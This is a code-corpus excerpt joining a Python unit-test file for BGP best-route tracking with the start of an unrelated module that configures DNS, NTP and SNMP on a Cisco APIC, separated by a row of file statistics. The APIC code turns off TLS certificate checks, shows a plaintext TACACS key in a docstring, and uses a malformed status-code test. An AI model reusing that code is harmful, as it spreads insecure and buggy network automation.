self.assertEqual(0, self.tracker_worker._best_route_removed.call_count,
'best_route_removed should not have been called')
def test_b1_is_the_current_best_route(self):
# The route which is advertised by another source is the current best
# route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route for NLRI1
self._append_call("RE1")
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B advertises the same route for NLRI1
self._append_call("RE2")
route_nlri1B = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Source A withdraws the route for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B withdraws the route for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(
1, self.tracker_worker._new_best_route.call_count,
'1 new best route call for NLRI1')
self._check_calls(
self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route_nlri1B.route_entry, True)])
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
def test_b2_is_not_the_current_best_route(self):
# The route which is advertised by an other source is not the current
# best route but will become the best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises route1 for NLRI1
self._append_call("RE1")
route1Nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises route2 for NLRI1 : route1 is better than route2
self._append_call("RE2")
route2Nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C advertises also route2
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 200)
# Source A withdraws route1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new best route call for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1Nlri1.route_entry),
(t.NLRI1, route2Nlri1.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1Nlri1.route_entry, False)])
def test_c1_route1_best_route(self):
# Route1 is the best route
# Mock objects
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources : A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2 for NLRI1 with different attributes.
# Route1 is better than Route2
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source A withdraws route1 for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B withdraws route2 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3",
t.NBR, t.BRR, "RE4", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1b.route_entry)])
self.assertEqual(
2, self.tracker_worker._best_route_removed.call_count,
'2 best_route_removed calls for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False),
(t.NLRI1, route2_nlri1b.route_entry, True)])
def test_c2_route2_best_route(self):
# Route2 is the best route
# Mock objects
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B advertises a route2 for NLRI1. Route2 is better than Route1
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source A withdraws route1 for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", t.NBR, t.BRR, "RE3"]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1b.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False)])
def test_c3_select_new_best_route_among_several(self):
# When current best route is withdrawn, the new best route should be
# selected among several routes
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2 for NLRI1. Route1 is better than Route2
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C advertises a route3 for NLRI1. Route2 is better than Route3
self._append_call("RE3")
route3_nlri1c = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 100)
# Source A withdraws route1 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B withdraws route2 for NLRI1
self._append_call("RE5")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C withdraws route3 for NLRI1
self._append_call("RE6")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3",
"RE4", t.NBR, t.BRR, "RE5",
t.NBR, t.BRR, "RE6", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
3, self.tracker_worker._new_best_route.call_count,
'3 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1b.route_entry),
(t.NLRI1, route3_nlri1c.route_entry)])
self.assertEqual(
3, self.tracker_worker._best_route_removed.call_count,
'3 best_route_removed calls for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False),
(t.NLRI1, route2_nlri1b.route_entry, False),
(t.NLRI1, route3_nlri1c.route_entry, True)])
def test_d1_ecmp_routes(self):
# ECMP routes are routes advertised by the same worker with the same
# LP and different NH
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A advertises a route2 for NLRI1. route2 is equal to route1
# with compare_routes, but the next_hop are different
self._append_call("RE2")
route2_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH2, 100)
# Source A withdraws route1 for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A withdraws route2 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH2, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", t.NBR,
"RE3", t.BRR, "RE4", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1a.route_entry)])
self.assertEqual(
2, self.tracker_worker._best_route_removed.call_count,
'2 best_route_removed calls for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False),
(t.NLRI1, route2_nlri1a.route_entry, True)])
def test_e1_replace_br_is_nbr(self):
# Advertise a route that replaces the best route and becomes the new
# best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 200)
# Source A advertises a route2 for NLRI1. Route1 is better than Route2
# BUT Route2 replaces Route1
self._append_call("RE2")
route2_nrli1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100, route1_nlri1a.route_entry)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nrli1a.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False)])
def test_e2_replace_br_is_not_nbr(self):
# Advertise a route that replaces the best route but does not become
# the new best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources : A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2. Route1 is better than Route2
self._append_call("RE2")
route2_nrli1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source A advertises a route3 for NLRI1. Route3 replaces Route1.
# Route2 is better than route3.
self._append_call("RE3")
route3_nrli1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100, route1_nlri1a.route_entry)
# Source B withdraws route2 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3", t.NBR,
t.BRR, "RE4", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
3, self.tracker_worker._new_best_route.call_count,
'3 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nrli1b.route_entry),
(t.NLRI1, route3_nrli1a.route_entry)])
self.assertEqual(
2, self.tracker_worker._best_route_removed.call_count,
'2 best_route_removed calls for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False),
(t.NLRI1, route2_nrli1b.route_entry, False)])
def test_e3_replace_br_is_not_nbr(self):
# Advertise a route that replaces the best route but does not become
# the new best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises route1 for NLRI1
self._append_call("RE1")
route1_nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises route2 for NLRI1 : route1 is better than route2
self._append_call("RE2")
route2_nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C advertises also route2
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 200)
# Source A advertises route3 which replaces route1
self._append_call("RE4")
self._new_route_event(engine.RouteEvent.ADVERTISE, t.NLRI1,
[t.RT1, t.RT2], worker_a, t.NH1, 100,
route1_nlri1.route_entry)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new best route call for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1.route_entry),
(t.NLRI1, route2_nlri1.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1.route_entry)])
def test_e4_not_replace_br(self):
# Advertise a route that does not replaces the best route and becomes
# the new best route when the best route is withdrawn
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources : A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2. Route1 is better than Route2
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source B advertises a route3 for NLRI1. Route3 replaces Route2.
# Route1 is better than Route3
self._append_call("RE3")
route3_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 100, route2_nlri1b.route_entry)
# Source A withdraws route1 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route3_nlri1b.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False)])
def test_e5_replace_br_is_nbr_equal(self):
# Same as E3, but the route that replaces our current best compares
# equally to the two initially less preferred routes, and becomes best
# route with them
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises route1 for NLRI1
route1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# We will only check events after this first one
# to allow for a order-independent test after RE4
del self.tracker_worker._new_best_route.call_args_list[:]
# Source B advertises route2 for NLRI1 : route1 is better than route2
self._append_call("RE2")
route2 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C advertises also route2
self._append_call("RE3")
route3 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH2, 200)
# Source A advertises route3 which replaces route1
self._append_call("RE4")
route4 = self._new_route_event(engine.RouteEvent.ADVERTISE,
t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH3, 200,
route1.route_entry)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = [t.NBR, "RE2", "RE3", "RE4",
t.NBR, t.NBR, t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route2.route_entry),
(t.NLRI1, route3.route_entry),
(t.NLRI1, route4.route_entry)], False)
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1.route_entry, False)])
| 44.954809 | 79 | 0.62924 | 5,146 | 38,796 | 4.470463 | 0.064516 | 0.066899 | 0.066507 | 0.039904 | 0.809737 | 0.78935 | 0.771528 | 0.746707 | 0.724103 | 0.716105 | 0 | 0.033332 | 0.277735 | 38,796 | 862 | 80 | 45.006961 | 0.787659 | 0.197881 | 0 | 0.696028 | 0 | 0 | 0.066296 | 0 | 0 | 0 | 0 | 0 | 0.072539 | 1 | 0.044905 | false | 0.003454 | 0.015544 | 0.001727 | 0.072539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a15cee3e5ac8f54ea19e07ce6e0e45ba938225f6 | 18,818 | py | Python | web_ui/controllers/apic_controller.py | ProgrammabilityandAutomation/ACI-conf-converter | e2be783109c6343539dee626971c215027831d00 | [
"Apache-2.0"
] | null | null | null | web_ui/controllers/apic_controller.py | ProgrammabilityandAutomation/ACI-conf-converter | e2be783109c6343539dee626971c215027831d00 | [
"Apache-2.0"
] | null | null | null | web_ui/controllers/apic_controller.py | ProgrammabilityandAutomation/ACI-conf-converter | e2be783109c6343539dee626971c215027831d00 | [
"Apache-2.0"
] | null | null | null | """
Manages calls to the ACI Controller (APIC)
Examples:
Syslog
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/slgroup-groupte-test.json
payload{"syslogGroup":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test","name":"groupte-test","rn":"slgroup-groupte-test","status":"created"},"children":[{"syslogConsole":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/console","rn":"console","status":"created"},"children":[]}},{"syslogFile":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/file","rn":"file","status":"created"},"children":[]}},{"syslogProf":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/prof","rn":"prof","status":"created"},"children":[]}},{"syslogRemoteDest":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/rdst-1.1.1.1","host":"1.1.1.1","name":"test","rn":"rdst-1.1.1.1","status":"created"},"children":[{"fileRsARemoteHostToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}]}}
response: {"totalCount":"0","imdata":[]}
SNMP
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/snmpgroup-snmp-test.json
payload{"snmpGroup":{"attributes":{"dn":"uni/fabric/snmpgroup-snmp-test","name":"snmp-test","rn":"snmpgroup-snmp-test","status":"created"},"children":[{"snmpTrapDest":{"attributes":{"dn":"uni/fabric/snmpgroup-snmp-test/trapdest-2.2.2.2-port-162","host":"2.2.2.2","secName":"public","rn":"trapdest-2.2.2.2-port-162","status":"created"},"children":[{"fileRsARemoteHostToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}]}}
response: {"totalCount":"0","imdata":[]}
NTP
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/time-default/ntpprov-3.3.3.3.json
payload{"datetimeNtpProv":{"attributes":{"dn":"uni/fabric/time-default/ntpprov-3.3.3.3","name":"3.3.3.3","preferred":"true","rn":"ntpprov-3.3.3.3","status":"created"},"children":[{"datetimeRsNtpProvToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}
response: {"totalCount":"0","imdata":[]}
DNS
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/dnsp-default/prov-[4.4.4.4].json
payload{"dnsProv":{"attributes":{"dn":"uni/fabric/dnsp-default/prov-[4.4.4.4]","addr":"4.4.4.4","status":"created","preferred":"true","rn":"prov-[4.4.4.4]"},"children":[]}}
response: {"totalCount":"0","imdata":[]}
TACACS
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/userext/tacacsext/tacacsplusprovider-5.5.5.5.json
payload{"aaaTacacsPlusProvider":{"attributes":{"dn":"uni/userext/tacacsext/tacacsplusprovider-5.5.5.5","name":"5.5.5.5","key":"cisco123","rn":"tacacsplusprovider-5.5.5.5","status":"created"},"children":[{"aaaRsSecProvToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}
response: {"totalCount":"0","imdata":[]}
"""
from jinja2 import Environment
from jinja2 import FileSystemLoader
import os
import requests
import json
DIR_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
JSON_TEMPLATES = Environment(loader=FileSystemLoader(DIR_PATH + '/json_templates'))
def get_token(url, username, password):
"""
Returns authentication token
:param url:
:param username:
:param password:
:return:
"""
template = JSON_TEMPLATES.get_template('login.j2.json')
payload = template.render(username=username, password=password)
response = requests.post(url + '/api/aaaLogin.json', data=payload, verify=False)
if 199 < response.status_code < 300:
auth = json.loads(response.text)
login_attributes = auth['imdata'][0]['aaaLogin']['attributes']
return login_attributes['token']
else:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_dns(url, auth_token, dns_ip):
"""
Creates a DNS Server in APIC
:param url:
:param auth_token:
:param dns_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_dns.j2.json')
payload = template.render(dns_ip=dns_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/dnsp-default/prov-[' + dns_ip + '].json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
template = JSON_TEMPLATES.get_template('add_dns_mgmt_epg.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/dnsp-default/rsProfileToEpg.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_ntp_pool(url, auth_token, ntp_ip):
"""
Creates a NTP pool in APIC
:param url:
:param auth_token:
:param ntp_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_ntp_pool.j2.json')
payload = template.render(ntp_ip=ntp_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/time-conf-converter.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_ntp_group_policy(url, auth_token):
"""
Add conf converter NTP pool to default group policy
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_ntp_to_group_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/funcprof/podpgrp-default/rsTimePol.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_default_pod_profile(url, auth_token):
"""
Add default policy group to pod profile
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_default_pod_profile.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/podprof-default/pods-default-typ-ALL/rspodPGrp.json',
cookies=cookies, data=payload, verify=False)
if 199 < response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_snmp_group(url, auth_token, snmp_ip, snmp_port, snmp_community_name, snmp_security_level="", snmp_version='2c'):
"""
Creates a SNMP Server in APIC
:param url:
:param auth_token:
:param snmp_ip:
:return:
"""
if snmp_version == '2c':
template = JSON_TEMPLATES.get_template('add_snmp_group.j2.json')
else:
template = JSON_TEMPLATES.get_template('add_snmp_group_v3.j2.json')
payload = template.render(snmp_ip=snmp_ip,
snmp_port=snmp_port,
